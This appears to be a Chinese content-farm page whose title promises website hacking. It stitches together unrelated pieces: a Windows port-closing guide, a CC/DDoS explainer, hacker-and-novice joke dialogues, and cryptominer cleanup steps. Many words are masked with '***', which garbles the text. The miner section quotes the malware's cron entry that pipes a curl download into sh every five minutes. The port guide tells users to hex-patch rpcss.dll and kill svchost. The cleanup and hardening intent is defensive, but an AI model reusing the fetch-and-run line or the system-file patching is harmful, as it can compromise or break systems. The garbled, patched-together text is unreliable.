黑客小白入侵网站,黑客 小白

黑客为什么很难攻破360

道高一丈魔高一丈，但杀软也不是傻子，现在的云防御等技术已经非常难攻破了，而且它们并不是都是坏的，骇客就是专门破坏的，黑客是指 *** 高手或维护人员，红客指爱国的黑客，白帽黑客是在网上帮各种网站进行善意的入侵，就是帮助它们找到漏洞并修复，黑帽黑客和骇客差不多，总之你不用太担心，小心病毒就好了

怎么预防别人入侵我的电脑

1、打好补丁

2、开防活墙

3、关闭端口

***

我相信有很多人都不知道自己开了什么端口.更加不知道怎么关闭端口.

你可以用查看端口的软件查看.

也可以通过在运行里输入"cmd"

在弹出的cmd命令行里输入

netstat -an 来查看自己开放端口.ip地址的后面的就是端口号.

以下是我自己写的一篇关于关闭端口的详细步骤和多种 ***

有很多人问我如何关闭端口,所以我(流云)整理了一下关于关闭端口的资料,并给大家写这篇文章介绍关于关闭端口的多种 *** (包括系统的 *** :修改注册表和关闭服务;通过创建 IP 安全策略来屏蔽端口的 *** ;增加防火墙的规则屏蔽端口;通过本地连接的TCP/IP筛选来过滤端口;)由于入侵的基础就在于端口,所以关闭掉可能会被入侵的端口,这样你的电脑的安全悉数就提高了.这里先介绍一下,关于入侵最多的几个端口的系统关闭 *** .

1.系统关闭 *** :

(1)21端口:

端口说明: ftp 最常见的攻击者用于寻找打开“anonymous”的ftp服务器的 *** 。

这些服务器带有可读写的目录。Hackers或Crackers 利用这些服务器

作为传送warez (私有程序) 和pr0n(故意拼错词而避免被搜索引擎分

类)的节点。

关闭 *** :控制面板--管理工具--服务

关闭FTP Publishing Service,它提供的服务是通过 Internet 信息服务

的管理单元提供 FTP 连接和管理。

(2)23端口

端口说明:Telnet 入侵者在搜索远程登陆UNIX的服务。大多数情况下入侵者扫

描这一端口是为了找到机器运行的操作系统。此外使用其它技术，入

侵者会找到密码。

关闭 *** :控制面板--管理工具--服务

关闭Telnet服务，它允许远程用户登录到系统并且使用命令行运行控

制台程序。

(3)25端口

端口说明: *** tp 攻击者（spammer）寻找 *** TP服务器是为了传递他们的spam。

入侵者的帐户总被关闭，他们需要拨号连接到高带宽的e-mail服务器

上，将简单的信息传递到不同的地址。 *** TP服务器（尤其是sendmail）

是进入系统的最常用 *** 之一，因为它们必须完整的暴露于Internet且

邮件的路由是复杂的（暴露+复杂=弱点）。

关闭 *** :控制面板--管理工具--服务

关闭Simple Mail Transport Protocol ( *** TP)服务，它提供的功能是

跨网传送电子邮件.

(4)80端口

端口说明:80端口是为HTTP（HyperText Transport Protocol，超文本传输协

议）开放的，这是上网冲浪使用最多的协议，主要用于在WWW

（World Wide Web，万维网）服务上传输信息的协议。

关闭 *** :控制面板--管理工具--服务

关掉WWW服务。在“服务”中显示名称为"World Wide Web

Publishing Service"，通过Internet 信息服务的管理单元提供 Web

连接和管理。

(5)135端口

端口说明c-serv MS RPC end-point mapper Microsoft在这个端口运行DCE

RPC end-point mapper为它的DCOM服务。这与UNIX 111 端口的功

能很相似。使用DCOM和/或RPC的服务利用机器上的end-point mapper

注册它们的位置。远端客户连接到机器时，它们查询end-point

mapper找到服务的位置。同样Hacker扫描机器的这个端口是为了找到

诸如：这个机器上运行ExchangeServer吗?是什么版本？

关闭 *** :用一款16为编辑软件（推荐UltraEdit）打开你系统

winnt\system32 或者 x:\windows\system32下的rpcss.dll文件。

查找31 00 33 00 35

替换为30 00 30 00 30

查找3100330035，将其替换为3000300030，意思就是将135端口

改为000。至此修改的任务已经完成，下面将面临一个保存的问题。

因为该文件正在运行，在Windows环境下是不能覆盖的。如果你是

FAT32文件系统，那么直接引导进DOS环境，将修改好的文件覆盖掉

原来的文件。

如果是NTFS格式，相对就麻烦一些。进安全模式。然后启动pulist列

出进程，然后用pskill这个程序（黑客网站有下的）杀掉svchost.exe

程序。然后在COPY过去。

覆盖后重新启动，使用netstat -an命令，可以看到Windows 2000下

已经没有135端口了。XP系统还有TCP的135，但是UDP里面已经没有

135端口了。

(如果看不懂以上的 *** ,我帮大家找了一个有图片的关闭 ***

)

135端口的详细关闭 *** :

(6)139端口

端口说明: File and Print Sharing 通过这个端口进入的连接试图获

NetBIOS/ *** B服务。这个协议被用于Windows“文件和打印机共享”

和SAMBA。在Internet上共享自己的硬盘是可能是最常见的问题。

Ipc$就是要依赖这个端口的.

关于此端口的命令详解和入侵技巧请参照我发的帖子

;fpage=1

关闭 *** :139端口可以通过禁止N *** 来屏蔽

本地连接－TCP/IT属性－高级－WINS－选‘禁用TCP/IT上的NETBIOS’

一项

(7)445端口:

端口说明: 445端口是般是信息流通数据的端口，一般黑客都是通过这个端口对你

的计算机或木马的控制，windows2000以后的版本都会自动打开这个

端口。一般流行性病毒，如冲击波，震荡婆，灾飞都是从这个端口对

计算机开始攻击！

关闭 *** :445端口可以通过修改注册表来屏蔽

添加一个键值

Hive: HKEY_LOCAL_MACHINE

Key: System\Controlset\Services\Net *** \Parameters

Name: *** BDeviceEnabled

Type: REG_DWORD

Value: 0

修改完后重启机器

(8)3389端口

端口说明: 3389又称Terminal Service，服务终端。在WindowsNT中更先开始使

用的一种终端，在Win2K的Professional版本中不可以安装，在Server

或以上版本才可以安装这个服务，其服务端口为3389。由于使用简

单，方便等特点，一直受系统管理员的青昧。也正式因为他的简便，

不产生交互式登陆，可以在后台操作，因此也受到了黑客朋友的喜

爱，事实可以说明，现在大多数朋友在入侵之后，都想打开windows

终端服务，甚至不惜重启对方的计算机，也要把终端服务安装上，由

此可见他的普遍性。另，在在XP系统中又叫做“远程桌面”。

关闭 *** :首先说明3389端口是windows的远程管理终端所开的端口，它并不是

一个木马程序，请先确定该服务是否是你自己开放的。如果不是必须

的，请关闭该服务。

win2000关闭的 *** ：

win2000server 开始--程序--管理工具--服务里找到Terminal Services服务项，

选中属性选项将启动类型改成手动，并停止该服务。

win2000pro 开始--设置--控制面板--管理工具--服务里找到Terminal Services

服务项，选中属性选项将启动类型改成手动，并停止该服务。

winxp关闭的 *** ：

在我的电脑上点右键选属性--远程，将里面的远程协助和远程桌面两个选项框里的勾去掉。

(9)4489端口

端口说明: 首先说明4899端口是一个远程控制软件（remote administrator)服务

端监听的端口，他不能 算是一个木马程序，但是具有远程控制功能，

通常杀毒软件是无法查出它来的，请先确定该服务是否是你自己开放

并且是必需的。如果不是请关闭它。

关闭 *** :请在开始--运行中输入cmd(98以下为command),然后cd

C:\winnt\system32(你的系统安装目录），输入r_server.exe /stop

后按回车然后在输入r_server /uninstall /silence 到C:\winnt\system32

(系统目录）下删除r_server.exe admdll.dll radbrv.dll三个文件

(10)默认共享:

很多人根本就还不知道有默认共享这么一回事,其实系统一装好都是打开默认共享的.把c,d默认共享为c$,d$.其实这个是相当危险的,这个就相当于开着门让黑课进来.可以通过很多种 *** 入侵.其中以ipc$最为著名.所以一定关闭它.关闭的 *** 有很多种.

端口说明:这是在安装服务器的时候，把系统安装分区自动进行共享，虽然对其访

问还需要超级用户的密码，但这是潜在的安全隐患，从服务器的安全考

虑，更好关闭这个“默认共享”，以保证系统安全。

关闭 *** ：关于默认共享的关闭 *** 有很多种 *** .我这里根据自己所知的,归纳

了4种最常用的 *** .

1.DOS下删除共享

单击“开始/运行”，在运行窗口中输入“cmd”(98则是command)，打开cmd命令行.用net share 命令查看自己是否开了默认共享和ipc$,所有的共享信息都可以在里面显示.选择你要的删除的共享.用net share xx /delete(此处的xx表示你要删除的共享文件)例如:net share c$ /delete 表示删除c盘的默认共享(根据我的经验net share c:\ /delete 其实也是一样删除c盘的默认共享的).

2.盘符属性

确定你要删除的盘符,单击鼠标右键选择共享和安全的选项.在弹出的窗口中选择不共享此文件夹.然后点确定.这样就关闭了共享(包括默认共享).

3.控制面板中删除

控制面板—管理工具—计算机管理—共享文件夹—共享

关闭里面的默认共享(包括admin$的删除)

4. 修改注册表

单击“开始/运行”，在运行窗口中输入“Regedit”，打开注册表编辑器，展开“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Lanmanworkstation\parameters”，在右侧窗口中创建一个名为“AutoShareWks”的双字节值，将其值设置为0，(win2000 专业版 win xp);[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\

lanmanserver\parameters]"AutoShareServer"=dword:00000000 (win2000 server、win2003 server)这样就可以彻底关闭“默认共享”。

以上几个端口都是最常入侵的端口,也是最适合一般用户的电脑.至于其他特定软件所开放的端口可以根据通过创建 IP 安全策略来屏蔽端口的 *** ;增加防火墙的规则屏蔽端口;通过本地连接的TCP/IP筛选来过滤端口的 *** 来关闭端口.以下介绍一下通过创建 IP 安全策略来屏蔽端口的 *** 的 *** 来关闭端口,由于增加防火墙的规则屏蔽端口;通过本地连接的TCP/IP筛选来过滤端口的 *** 和过创建 IP 安全策略来屏蔽端口的 *** 差不多,所以就不重复讲了.这里就先介绍一下创建 IP 安全策略来屏蔽端口的 *** .

2.创建 IP 安全策略来屏蔽端口:

关闭的端口有，135，137，138，139，445，1025，2475，3127，6129，3389，593，还有tcp.

具体操作如下:

默认情况下，Windows有很多端口是开放的，在你上网的时候， *** 病毒和黑客可以通过这些端口连上你的电脑。为了让你的系统变为铜墙铁壁，应该封闭这些端口，主要有：TCP 135、139、445、593、1025 端口和 UDP 135、137、138、445 端口，一些流行病毒的后门端口（如 TCP 2745、3127、6129 端口），以及远程服务访问端口3389。下面介绍如何在WinXP/2000/2003下关闭这些 *** 端口：

之一步，点击“开始”菜单/设置/控制面板/管理工具，双击打开“本地安全策略”，选中“IP 安全策略，在本地计算机”，在右边窗格的空白位置右击鼠标，弹出快捷菜单，选择“创建 IP 安全策略”（如右图），于是弹出一个向导。在向导中点击“下一步”按钮，为新的安全策略命名；再按“下一步”，则显示“安全通信请求”画面，在画面上把“激活默认相应规则”左边的钩去掉，点击“完成”按钮就创建了一个新的IP 安全策略。

第二步，右击该IP安全策略，在“属性”对话框中，把“使用添加向导”左边的钩去掉，然后单击“添加”按钮添加新的规则，

随后弹出“新规则属性”对话框，在画面上点击“添加”按钮，弹出IP筛选器列表窗口；在列表中，首先把“使用添加向导”

左边的钩去掉，然后再点击右边的“添加”按钮添加新的筛选器。

第三步，进入“筛选器属性”对话框，首先看到的是寻址，源地址选“任何 IP 地址”，目标地址选“我的 IP 地址”；

点击“协议”选项卡，在“选择协议类型”的下拉列表中选择“TCP”，然后在“到此端口”下的文本框中输入“135”，点击

“确定”按钮（如左图），这样就添加了一个屏蔽 TCP 135（RPC）端口的筛选器，它可以防止外界通过135端口连上你的电脑 。

点击“确定”后回到筛选器列表的对话框，可以看到已经添加了一条策略，重复以上步骤继续添加 TCP 137、139、445、593

端口和 UDP 135、139、445 端口，为它们建立相应的筛选器。

重复以上步骤添加TCP 1025、2745、3127、6129、3389 端口的屏蔽策略，建立好上述端口的筛选器，最后点击“确定”按钮。

第四步，在“新规则属性”对话框中，选择“新 IP 筛选器列表”，然后点击其左边的圆圈上加一个点，表示已经激活，

最后点击“筛选器操作”选项卡。在“筛选器操作”选项卡中，把“使用添加向导”左边的钩去掉，点击“添加”按钮，添加

“阻止”操作（右图）：在“新筛选器操作属性”的“安全措施”选项卡中，选择“阻止”，然后点击“确定”按钮。

第五步、进入“新规则属性”对话框，点击“新筛选器操作”，其左边的圆圈会加了一个点，表示已经激活，点击“关闭”按钮，关闭对话框；最后回到“新IP安全策略属性”对话框，在“新的IP筛选器列表”左边打钩，按“确定”按钮关闭对话框。

在“本地安全策略”窗口，用鼠标右击新添加的 IP 安全策略，然后选择“指派”。

于是重新启动后，电脑中上述 *** 端口就被关闭了，病毒和黑客再

也不能连上这些端口，从而保护了你的电脑。

本人建议:如果你要关闭的端口是比较常见的入侵端口的话,我建议你采用系统的关闭 *** .这样更加直接和有效.而一般的端口的话,你不想开可以采用ip安全策略或者防火墙或者TCP\IP筛选来关闭.将来你想开这个端口或者软件需要用的时候,只要去掉规则就可以了.这里还有提醒大家一点,端口从1024开始到65535都是应用程序所开启的端口(当然也包括木马和病毒).除非你很确定这个端口是木马或者病毒或者是没用途的端口,不然不建议关闭.不然会出现很多问题.

以下是电脑端口基础知识

端口可分为3大类：

1） 公认端口（Well Known Ports）：从0到1023，它们紧密绑定于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如：80端口实际上总是HTTP通讯。

2） 注册端口（Registered Ports）：从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口，这些端口同样用于许多其它目的。例如：许多系统处理动态端口从1024左右开始。

3） 动态和/或私有端口（Dynamic and/or Private Ports）：从49152到65535。理论上，不应为服务分配这些端口。实际上，机器通常从1024起分配动态端口。但也有例外：SUN的RPC端口从32768开始。

由于时间的关系,稍微就介绍以上的几种 *** .其实关闭端口还有很多种 *** .这里就先介绍到这里吧.如果文章有什么不足之处.希望大家提出来.我一定好好修改

小白话说CC攻击与DDOS

前几天，公司的网站遭受了CC攻击，整理了下今天我们简单说说CC攻击与DDOS。

DDoS 攻击

DDoS是Distributed Denial of Service的英文缩写，意思是“分布式拒绝服务攻击”，那么什么是ddos呢？可以这么理解，凡是导致合法用户不能够正常访问 *** 服务的行为都算是ddos攻击。

一旦实施分布式拒绝服务攻击，攻击 *** 数据包就会从多个DOS攻击源(俗称肉鸡)犹如洪水般涌到受害主机，从而导致主机无法正常接收合法用户的 *** 数据包，这样就导致网站打不开了。也就是说，ddos攻击的目的非常明确，就是阻止正常的用户访问正常的 *** 资源，从而达到攻击者不可告人的目的。与其他恶意数据篡改或劫持攻击不同，DDoS简单粗暴，可以直接摧毁目标。另外，与其他攻击方式相比，DDoS技术要求低，攻击成本低，只需要购买一些服务器或者控制一批肉鸡。而且对应的攻击速度很快，攻击效果可见。另一方面，DDoS具有易攻难守的特点，服务提供商需要花费大量资源对抗攻击发起者，才能满足正常客户的需求。这些特点使得DDoS成为黑客手中一把利剑。虽然DDoS可以侵蚀带宽或资源，迫使服务中断，但远非黑客的真实目的，所谓没有买卖就没有伤害，DDoS只是黑客手中的核武器，他们的目的要么是敲诈勒索，要么是商业竞争，要么是政治立场。在这种黑色利益的驱使下，越来越多的人参与到这个行业中来，完善和升级攻击手段，使得DDoS在互联网行业中愈演愈烈，成为一种在全球范围内无法克服的顽疾。

CC攻击

CC攻击(Challenge Collapsar)是DDOS攻击的一种，也是一种常见的网站攻击方式，它利用 *** 服务器向受害服务器发送大量看似合法的请求，导致网页无法正常访问。攻击者通过 *** 服务器或肉鸡向受害主机不断发送大量数据包，导致对方服务器CPU长时间100%占用，网页无法打开。让站长最担心的是这种攻击的技术含量低，利用更换IP *** 和使用一些IP *** 一个初、中级电脑水平的用户都能够实施攻击。之所以选择 *** 服务器，是因为 *** 可以有效隐藏自己的身份，绕过防火墙，因为基本上所有的防火墙都会检测并发TCP/IP连接的数量，如果超过一定的数量和频率，就会被认为是Connection-Flood。

CC攻击是目前攻击应用层的主要手段之一，应用层是我们的用户可以看到的，比如网页。每个人或许都有这样的经历：当一个网页被非常多的人访问时，打开一个网页是很慢的。访问一个静态页面并不需要太长时间，即使人很多。但是，如果你访问论坛、贴吧等。在高峰期，它会非常慢，因为服务器系统需要去数据库判断访问者是否有权限阅读帖子、发言等。访问量越大，论坛的页面越多，对数据库的压力越大，被访问的频率越高，占用的系统资源也会越高。CC攻击充分利用了这一特性，模拟很多正常用户不断访问论坛等需要大量数据操作的页面，造成服务器资源的浪费，导致CPU长时间处于100%状态，永远都有处理不完的连接，致使 *** 拥塞，造成网站无法被正常访问。

总结

不论是ddos还是cc攻击都是让人们头疼的一件事，高级的D阔甚至可以导致譬如京东、百度等大型网站打不开，每年的 *** 攻击量都是十分巨大的，还记得之前听过的一个故事，某个购物网站市值5个亿，而某商业大佬想要收购该网站但并不想付五个亿，于是便请来了一位高端D阔，造成该购物网站30天无法正常访问，直接使这个购物网站市值下降到了两个亿。其实许多大型网站都遭受着 *** 攻击，DDoS攻击的产业化不仅增加了打击难度，还降低了DDoS攻击的实施门槛， *** 安全已经刻不容缓。

一篇小白与黑客的笑话

黑客：我控制了你的电脑

小白：怎么控制的？

黑客：用木马

小白：……在哪里？我为什么看不见？

黑客：打开你的任务管理器

小白：“我的电脑”里没有啊

黑客：算了，当我什么也没做过

黑客：我已经控制了你的电脑

小白：哦

黑客：害怕了吧？！嘿嘿

小白：来的正好，帮我杀杀毒吧，最近我的机子毛病很多耶

黑客：……

小白：你怎么总是在我的电脑里随便进进出出？

黑客：你可以装防火墙

小白：装防火墙，你就不能进入了吗？

黑客：不啊，我只是想增加点趣味性，这样控制你的电脑让我觉得很白吃

小白：听说你会制造“病毒”？

黑客：嗯

小白：你可以控制别人的电脑？！

黑客：一般是的

小白：那你可以黑掉那些网站吗？

黑客：当然，没听到人家叫我“黑客”吗？

小白：……哦，我还以为那是因为你长得很黑……

“硄！“

黑客：我又来了！！

小白：你天天进来不觉得很烦吗？

黑客：是很烦，你的机子是我见过的最烂的一台了

小白：不是吧，这可是名牌

黑客：我是说你的机子里除了弱智游戏就只有病毒了

小白：哦，那你看到我的“连连看”了吗？不记得装在哪，找了好久了耶

黑客：……再见

黑客：嗨！我来了

小白：好几天不见你，被我的防火墙挡住啦？

黑客：哈哈，笑话，上你的机子比我的还容易，不是想我了吧？

小白：我是想请你帮一个忙

黑客：什么事？

小白：你能不能进入电力系统修改一点数据

黑客：……你想干吗！！

小白：求求你，帮我把我家这个月得电费消了吧……

黑客：去死！！

黑客：你死哪去了？！！

小白：……出去玩了几天啊，找 *** 吗？

黑客：我要找点东西

小白：在我这儿找什么东西？

黑客：病毒，找一条前几年的老病毒，只有你的机子上病毒保存的最全啦！

黑客：我来了！！

小白：……

黑客：怎么不说话？

小白：心情不好

黑客：谁欺负你了？

小白：我的一个抠抠号搞丢了，里面有我的网上初恋

黑客：这个简单，我帮你拿回来

小白：拿不回来了

黑客：不可能，告诉我，多少号？

小白：呜……就是不记得了

小白：你给我出来！！！！

黑客：怎么啦？！

小白：你是不是用我的ID去论坛玩了？！！

黑客：。。。。不好意思，忘了告诉你了，不过，我没干坏事，就瞎编了个贴子，我保证下次再也不玩了

小白：那不行！！！

黑客：你还要怎么样？

小白：你发的贴子得红脸了耶，我之一次得红脸，好开心哦，你必须再给我编一个

黑客：倒！

黑客：嘿嘿，刚才我做了一件很有趣的事

小白：什么事

黑客：我到论坛上去顶贴了

小白：这很平常啊

黑客：我见贴就顶，尽情的骂楼主是猪，好解气

小白：哇塞，太过瘾了，我可从来不敢，会被封杀的！

黑客：没错，已经被封杀了。

小白：这还有趣？！

黑客：是啊，因为我用的是你的ID

小白：你是高手吗？

黑客：可以说是吧。

小白：高到什么程度？

黑客：嗯，我无聊的时候就自己黑自己

小白：哈，这个我也会！

黑客：#￥%！你也可以？！

小白：是啊，一关机它就黑了。。。。。

黑客：滚开........！

白:小黑,快出来,我的抠抠密码被盗用了,555～～～～

黑客:没问题,我给你找回来......(十分钟后)没有啊,我用你的号码登陆没有问题啊......

小白:那我为什么上不去?

黑客:我看看........姐姐,你打开的好像是m！s！n的登陆框......

小白:哦,原来这两个不能通用啊......

黑客:光当........

小白:小黑,快出来!!!

小黑:什么事情啊?我还没睡醒啊!

小白:为什么我的抠抠密码输不进去啊?

小黑:你用什么输的啊?

小白:当然是小键盘拉,笨蛋!

小黑:............你的小键盘没打开怎么输的进去啊?

小白:你帮我打开撒!!!

小黑:............................(吐血中)

小白:小黑,快告诉google是什么?

黑客:是搜索引擎,就是你找东西很快的!

小白:嗯,我试试,

黑客:试了没有

小白:试了,我用baidu一下子就找到goolge了,

黑客:你能涌用石头扔我一下

小白:我们见见面好吗?

黑客:........这、不太好吧,为什么要见

小白:我想看看你是不是和我想的一样

黑客:呵,你想的什么样?

小白:很帅,穿着紧身衣,又很神奇,哪里都能去,到处维持世界和平啦

黑客:........你说的是蜘蛛侠,老大!

黑客:哈喽~~~

小白:你每天都来,是不是对我很好奇?

黑客:不是好奇,是习惯,顺手就进来了

小白:哼,我有个好办法可以改变你的这个习惯

黑客:........哦?!什么办法

小白:我去电信局把带宽改成1K,这样你就挤进不来了,因为太窄,哈哈~~

黑客:天才啊!..........那你还能上网吗?

小白:能啊,慢慢上呗!

小白:我今天学到点电脑知识.很厉害的

黑客:说说看.

小白:可以一次就让电脑上什么东西都看不到.

黑客:晕!怎么可能,从来没听说过.

小白:把显示器关掉就什么都没有了,哈哈,聪明吧~

黑客:``````````去死~

黑客:你电脑桌面上怎么那么多东西?

小白:方便寻找啊.

黑客:可你把DVD电影放桌面上干吗?

小白:偶稀饭看那电影啊,好感人的.

黑客:`````````````

小白:小黑,问你哦,怎么电脑右下角老提示"C盘空间不足释放```````"

黑客:靠!

黑客:喂!

黑客:喂!小白~

黑客:怎么不理我了?

小白:我在哭.

黑客:啊?怎么啦?谁欺负你了?

小白:不是,没谁欺负我

黑客:那怎么哭噢?

小白:看蜡笔小新,小新迷路了~他好可怜~555555~

黑客:-_-|||,那你继续哭!!!!

小白:我想装杀毒软件

黑客:恩,好,你电脑是需要一个杀毒的.

小白:我要装名牌的,更好是SONY的,要不就宝马也行.

黑客:adidas好不好?

小白:行,你帮我装一下吧.

黑客:靠!我有事!

小白:小黑,假如我想删除电脑上没用过的东西,但又删不掉怎么办?

黑客:可以在启动电脑时,按F8,进"带命令的安全模式"-"路径"-再DEL文件名,OK了~

小白:我想把C盘中windows这东东删掉

黑客:那是系统文件夹

小白:可我都一直没用过它啊.

黑客:我不应该和你讨论这问题的!靠~

小白:你真的觉得偶很 *** ?

黑客:是根本就是.

小白:偶网友都说偶很聪明的

黑客:他们怎么说的?

小白:不告诉你*_*

黑客:一定是你又把PLMM的照片发给他们看了是吧?

小白:你怎么知道?~~~~

黑客:靠!!

小白:小黑噢?你暑假有米有有趣的事?

黑客:有啊,怎么突然问这个?

小白:那你发给偶,详细点..

黑客:哦,那你等等..

(15分钟过后)

黑客:不对啊,你要我发给你干吗?

小白:偶老师要偶交暑假作业,记暑假有趣的事10篇..

黑客:靠靠靠!!

黑客:我们认识有一段时间了吧?

小白:恩啊

黑客:你觉得我对你好不好?

小白:还不错..

黑客:嘻嘻(害羞)

小白:干吗?要借钱啊?

黑客:````````````

小白:偶米钱,还欠班长5块钱没还呢!

黑客:````````````当我什么都没问..

小白:出来!问你!·黑客:什么?

小白:你会盗抠抠么?

黑客:废话!

小白:那你帮偶盗一抠抠号..

黑客:说号码..

小白:10000

黑客:!·#￥%……—*

黑客:我又来了..

小白:来得正好,我有事求你..

黑客:什么事?这次不是让我帮你把水费也改了吧!

小白:你会破解密码吗?

黑客:废话,我是黑客唉............

小白:帮我把达芬奇密码解一下吧!

黑客:去死, *** 电影看多了............

小白:你每天进我的电脑觉得有意思吗?

黑客:有意思啊!

小白:有什么意思

黑客:我在研究你这满是病毒的机子为什么不死机..

小白:我知道啊!

黑客:........#￥%!为什么?

小白:这叫以毒攻毒!

小白:我也想控制你的电脑

黑客:那不行,别人进入我电脑我会疯的

小白:这不公平!!

黑客:嗯,好吧,那你控制好了

小白:........可是我不会........

黑客:嘎嘎~~~所以我才同意啊!!!

黑客:我又又又来了

小白:这可能是我们最后一次见面了

黑客:哦?出什么事了?

小白:我要重装系统,杀毒,装防火墙,不让你进来了!

黑客:原来你这么讨厌我..........好吧,以后我不来了,再见

小白:嗯..........哎,等一等!!先教我什么是重装系统!

黑客:....................

小白:电脑方面的问题你能回答吗?

黑客:应该可以

小白:键盘上哪个键最帅?

黑客:..............不知道

小白:当然是"F4"!!

黑客:晕倒!

小白:再问你一个电脑方面的问题你能回答吗?

黑客:只要不是你的 *** 问题

小白:我是认真的!!你能操作我电脑吗?

黑客:嗯,是的

小白:那出问题了,你也能解决吧

黑客:你的问题,应该不难

小白:太好了,我的风扇好像不转了,帮我换一个吧

黑客:........我先走了

黑客:在玩什么呢?

小白:在清理电脑

黑客:你?!

小白:对啊,你说我这里病毒多,所以我准备把不认识的看不顺眼的文件统统删掉

黑客:住手!你才认识几个文件啊?你的机子不想要了?

小白:那我现在怎么办?

黑客:别动机子,上一边玩去吧

黑客:HI,小白,这段时间没见我想我了没?

小白:才没有想你,不过你来的正好..

黑客:又出了什么事?

小白:我用驴子下电影,可是,硬盘空间不够,你能想个办法吗?

黑客:我来看看~!~

黑客:小白,告诉你一个不幸的消息,由于你的电脑里病毒太多,病毒又生下了很多仔,都在争地盘了..

小白:啊~!~天那!

黑客:我还在听病毒们在小声议论说什么空间价又上涨了,好多病毒都买不起空间了,正准备发起暴动了..

小白:那怎么办呀?

黑客:这个简单,把空间价下调,买个硬盘啦~!~

小白:555555我的密码又忘记了

黑客:记性不好就把密码写在纸上嘛

小白:太长又复杂,抄一遍都能把人累死

黑客:就你这智力,设那么长密码干什么

小白:我觉得只有复杂到自己都记不住才能防止别人破译

黑客:结果你的密码唯一作用是难为了自己........

黑客:世界杯要开始了,男人的节日啊!

小白:不光男人,我也喜欢呢～～

黑客:你?!你能看懂足球?

小白:是啊,每届世界杯我都会爬起来看的

黑客:哈,太好了,我们终于可以有共同语言了,你喜欢哪支球队啊

小白:当然是中国队!!

黑客:没语言......

小白:出来~

黑客:什么事情啊?

小白:电影能复制吗?

黑客:能啊

小白:为什么我的电影不能复制?

黑客:你用什么复制的?

小白:笨蛋,当然是软盘了!

黑客:@#%^^%

小白:小黑,来了吗?

红客:我是红客,追踪一个黑客来到这的~

黑客:你在说我吗?^-^

红客:――|||他的机子里怎这么多病毒,是你干的吗?!

黑客:==|||有些吧,我来之前跟现在都差不多的~不信你问他自己

小白:才不是呢!

小黑:..........

小白:他来了之后我的风扇不转了,郁闷!

黑客:....................

红客:..........................

黑客:我靠!

小白:我今天帮同学修了电脑

黑客:就你?

小白:对啊..

黑客:天大的奇迹,你居然会修电脑????

小白:有什么好奇怪,她光驱不能读电影碟..

黑客:她是不是把DVD电影放到VCD光驱,然后放不出来?

小白:对啊,所以偶就知道肯定是她光驱坏了,叫她明天再买个VCD光驱..

黑客:······

小白:我想买个笔记本

黑客:软面抄还是硬面抄?

小白:晕倒,是笔记本电脑啦!

黑客:你买那个干什么?

小白:玩游戏、上网,关键是要漂亮、轻巧,方便带出去,最最重要的是一定要比隔壁阿花用的神气,你说我买哪种好呢?

黑客:这么高的要求啊,"文曲星"吧,最适合你啦!

小白:你能帮我个忙吗?

黑客:只要是 *** 上的,说!!!

小白:我在玩――-跑跑卡丁车..你帮我去偷一个由8个排气筒的车!

黑客:那是在韩国服务器里面才有的!

小白:我不管!!!你从韩国给我偷过来!我要在中国用!那我不就很牛了!呵呵~~~!

黑客:……………………我还有事,我先走了!

小白:你会玩劲舞团吗?

黑客:会!干嘛?

小白:你帮我弄个汤姆.克鲁斯上来!我好稀饭他呀!让他陪我跳舞!:)

黑客:88

黑客:我想问你一个问题

小白:问吧

黑客:............你有男朋友吗?

小白:有!

黑客:..........他是什么样的人?

小白:高大、英俊、威猛,开大公司,对我超级好..

黑客:哦,有点事我先走了......

小白:喂~喂喂~~~~~

小白:咦,怎么好久没看到你啊,被抓了?!

黑客:..........没有,挺忙的,你还好吗

小白:好啊,我也挺忙的,我把连连看玩通关了!!

黑客:..........你和男朋友还好吧

小白:男朋友?什么男朋友?

黑客:你不是有个高大英俊威猛的男朋友吗?!

小白:哦哦~~~~瞎编的,怕你小看我........

黑客:......你、这个超级大笨蛋!!!!

黑客:..............我喜欢你

小白:病毒?

黑客:什么病毒啊?我是说很不幸,我发现我很喜欢你

小白:又忽悠我,你总骂我 *** 的

黑客:对啊,你就是个大 *** ,但我为了维持世界和平,决定牺牲自己,免得你去祸害他人..

小白:..................

小白:你真的喜欢我吗

黑客:..........嗯

小白:有多喜欢

黑客:就是不见的时候心里空空的疼,见了呢,头很疼

小白:哦,明白了

黑客:??你明白什么了?

小白:原来你对我,就像一个有蛀牙的小孩面对巧克力!

黑客:笔记本你可以买这款

小白:哦,这个好吗

黑客:配置不错,牌子和售后都不错

小白:这个无所谓,重要的是都有什么颜色?

黑客:............只有黑色

小白:啊?!难道这些商家不考虑消费心理,不知道加点颜色或者做成汉堡包的样子吗?

黑客:嗯,要不先去玩具柜台看看?!

一天,一陌生人加了黑客.

陌生人:你好

黑客:闲人勿扰

陌生人:我是美女!不许对美女这么没礼貌

黑客:可惜,我已经有喜欢的人了

陌生人:我比你喜欢的人漂亮100倍

黑客:但她在我心理是最美的

陌生人:好肉麻

黑客:恕不奉陪

陌生人:喂....

....

黑客(暗爽):小白,小白,连IP都没变还想考验我??

阿里云服务器被挖矿了怎么办？(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL | sh

病毒文件内容如下，感兴趣的可以研究下：

 View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.

配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.

配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度

好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf

2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.